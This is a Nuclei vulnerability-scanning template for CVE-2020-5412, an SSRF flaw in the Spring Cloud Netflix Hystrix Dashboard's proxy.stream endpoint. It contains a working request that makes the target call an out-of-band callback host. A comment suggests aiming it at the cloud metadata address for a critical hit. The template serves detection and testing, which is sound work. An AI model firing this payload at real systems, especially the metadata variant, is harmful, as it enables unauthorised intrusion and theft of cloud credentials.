id: CVE-2020-5412

info:
  name: Full-read SSRF in Spring Cloud Netflix (Hystrix Dashboard)
  author: dwisiswant0
  severity: medium
  description: Spring Cloud Netflix, versions 2.2.x prior to 2.2.4, versions 2.1.x prior to 2.1.6, and older unsupported versions allow applications to use the Hystrix Dashboard proxy.stream endpoint to make requests
    to any server reachable by the server hosting the dashboard. A malicious user, or attacker, can send a request to other servers that should not be exposed publicly.
  reference:
    - https://tanzu.vmware.com/security/cve-2020-5412
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-5412
    cwe-id: CWE-610
  tags: cve,cve2020,ssrf,springcloud

requests:
  - method: GET
    path:
      - "{{BaseURL}}/proxy.stream?origin=http://{{interactsh-url}}"

      # To get crithit, try http://169.254.169.254/latest/metadata/

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: header
        words:
          - "Jelly"

      - type: status
        status:
          - 200